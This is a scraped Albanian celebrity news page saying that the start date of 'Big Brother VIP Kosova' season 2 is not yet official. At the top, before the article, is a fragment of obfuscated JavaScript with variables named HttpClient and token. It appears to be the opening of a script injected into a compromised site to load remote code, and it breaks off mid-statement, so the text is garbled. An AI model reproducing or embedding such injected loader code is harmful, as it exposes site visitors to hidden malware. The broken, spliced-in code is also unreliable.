;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kur do të fillojë Big Brother VIP Kosova 2?

By

Me bërjen zyrtare të lajmit se edicioni i dytë i ‘Big Brother VIP Kosova’ do të nisë në stinën e vjeshtës, në rrjet janë aluduar data të shumta, të pasakta rreth nisjes të këtij edicioni.

Deri më tani nuk ka pasur asgjë zyrtare nga organizatorët e këtij projekti gjigand, për datën e nisjes së ‘Big Brother’, i cili po pritet me kërshëri të madhe këtë vit, pas suksesit të edicionit të kaluar.

E kjo gjë u dëshmua ditën e sotme edhe nga organizatorët e këtij formati, Alaudin Hamiti dhe Liberta Spahiu, të cilët përmes disa postimeve në InstaStory nuk zbuluan ende datën e saktë të nisjes së ‘Big Brother’.

 

Na mbetet të presim në ditët në vijim për të mësuar datën zyrtare të nisjes së ‘Big Brother VIP Kosova’, e cila me siguri, ashtu si vitin e kaluar, do të zbulohet vetëm nga faqja e tyre zyrtare në rrjete sociale. /Prive.al

Artikuj të ngjashëm